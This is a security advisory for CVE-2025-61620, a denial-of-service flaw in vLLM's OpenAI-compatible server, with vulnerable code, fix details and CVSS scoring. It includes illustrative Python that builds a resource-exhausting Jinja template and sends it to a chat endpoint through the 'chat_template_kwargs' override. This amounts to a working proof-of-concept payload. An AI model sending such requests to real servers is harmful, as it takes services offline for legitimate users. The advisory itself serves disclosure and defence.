CVE-2025-61620


Date: October 17, 2025

Summary

A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the vLLM OpenAI-Compatible Server due to the ability to specify Jinja templates via the "chat_template" and "chat_template_kwargs" parameters. An attacker who can supply these parameters to the API can cause a service outage by exhausting CPU and/or memory resources.

Details

When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In Hugging Face "transformers", this rendering is performed with a Jinja template. The OpenAI-Compatible Server launched by "vllm serve" exposes a "chat_template" parameter that lets users specify that template, and it also accepts a "chat_template_kwargs" parameter to pass extra keyword arguments to the rendering function. Because Jinja templates support programming-language-like constructs (loops, nested iteration, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition (a minimal template sketch is shown further below).

Importantly, simply forbidding the "chat_template" parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for "apply_hf_chat_template" and then updates that dictionary with the user-supplied "chat_template_kwargs" via "dict.update". Since "dict.update" can overwrite existing keys, an attacker can place a "chat_template" key inside "chat_template_kwargs" to replace the template that "apply_hf_chat_template" will use (see the standalone sketch further below).

vllm/entrypoints/openai/serving_engine.py#L794-L816

    _chat_template_kwargs: dict[str, Any] = dict(
        chat_template=chat_template,
        add_generation_prompt=add_generation_prompt,
        continue_final_message=continue_final_message,
        tools=tool_dicts,
        documents=documents,
    )
    _chat_template_kwargs.update(chat_template_kwargs or {})

    request_prompt: Union[str, list[int]]
    if isinstance(tokenizer, MistralTokenizer):
        ...
    else:
        request_prompt = apply_hf_chat_template(
            tokenizer=tokenizer,
            conversation=conversation,
            model_config=model_config,
            **_chat_template_kwargs,
        )

Impact

If an OpenAI-Compatible Server exposes endpoints that accept "chat_template" or "chat_template_kwargs" from untrusted clients, an attacker can submit a malicious Jinja template (directly, or by overriding "chat_template" inside "chat_template_kwargs") that consumes excessive CPU and/or memory; an example request shape is sketched below. This can result in a resource-exhaustion denial of service that leaves the server unresponsive to legitimate requests.

Fixes

* https://github.com/vllm-project/vllm/pull/25794
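
For illustration only, the sketch below uses a hypothetical template (not one taken from the advisory) to show why unconstrained Jinja templates are dangerous: two nested loops multiply the work per request, so a few lines of template force the renderer to perform on the order of 10^8 iterations and accumulate the output in memory.

    # Hypothetical illustration of a resource-exhausting chat template.
    # jinja2 is the templating engine used for Hugging Face chat templates.
    from jinja2 import Template

    malicious_template = """
    {%- for i in range(10000) -%}
      {%- for j in range(10000) -%}
        {{ i * j }}
      {%- endfor -%}
    {%- endfor -%}
    """

    # Rendering performs ~10^8 iterations and builds a very large string;
    # on a server this ties up CPU for a long time and can exhaust memory.
    Template(malicious_template).render()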
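
The key-overwrite path can also be reproduced in isolation. The following is a minimal sketch (all values are illustrative, not the server's real defaults) of how a "chat_template" key nested inside "chat_template_kwargs" silently replaces the template the server intended to use, mirroring the "dict.update" call shown above.

    # Minimal sketch of the overwrite; values are illustrative only.
    server_template = "{{ messages | join(', ') }}"   # template the server intends to use

    # Keyword arguments as the server builds them before merging user input.
    _chat_template_kwargs = dict(
        chat_template=server_template,
        add_generation_prompt=True,
    )

    # Attacker-controlled request field: note the nested "chat_template" key.
    chat_template_kwargs = {
        "chat_template": "{% for i in range(10**8) %}x{% endfor %}",
    }

    # dict.update overwrites existing keys, so the attacker's template wins.
    _chat_template_kwargs.update(chat_template_kwargs or {})
    assert _chat_template_kwargs["chat_template"] != server_template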
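
On the wire, the attack is just an ordinary Chat Completions request carrying the extra field. The sketch below assumes a local "vllm serve" deployment on its default port 8000 and a placeholder model name; the "chat_template_kwargs" field is the parameter named in the advisory, everything else is illustrative.

    # Hedged sketch of an attacker-style request; endpoint and model name are
    # assumptions (default local "vllm serve" deployment), not advisory content.
    import requests

    payload = {
        "model": "my-model",                                  # placeholder
        "messages": [{"role": "user", "content": "hi"}],
        # Even if a top-level "chat_template" were rejected, the same key
        # nested inside "chat_template_kwargs" overrides the server template.
        "chat_template_kwargs": {
            "chat_template": "{% for i in range(10**8) %}x{% endfor %}",
        },
    }

    resp = requests.post(
        "http://localhost:8000/v1/chat/completions",
        json=payload,
        timeout=30,
    )
    print(resp.status_code)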

Severity Score

6.5 (Medium)

Weakness Type (CWE)

Improper Input Validation (CWE-20)

Uncontrolled Resource Consumption (CWE-400)

Allocation of Resources Without Limits or Throttling (CWE-770)

Top Fix


Upgrade Version

Upgrade vllm to version 0.11.0.


CVSS v3.1

Base Score: 6.5 (Medium) (see the computation below)
Attack Vector (AV): NETWORK
Attack Complexity (AC): LOW
Privileges Required (PR): LOW
User Interaction (UI): NONE
Scope (S): UNCHANGED
Confidentiality (C): NONE
Integrity (I): NONE
Availability (A): HIGH
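
The base score follows mechanically from the metric values listed above; the short computation below applies the standard CVSS v3.1 coefficients (nothing vLLM-specific) and reproduces the 6.5 figure.

    # CVSS v3.1 base-score computation for AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.
    import math

    av, ac, pr, ui = 0.85, 0.77, 0.62, 0.85   # Network, Low, Low (scope unchanged), None
    c, i, a = 0.0, 0.0, 0.56                  # Confidentiality None, Integrity None, Availability High

    iss = 1 - (1 - c) * (1 - i) * (1 - a)     # impact sub-score = 0.56
    impact = 6.42 * iss                       # scope unchanged
    exploitability = 8.22 * av * ac * pr * ui

    # Base score: 0 if there is no impact, otherwise round up to one decimal.
    base = 0.0 if impact <= 0 else math.ceil(min(impact + exploitability, 10) * 10) / 10
    print(base)                               # 6.5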
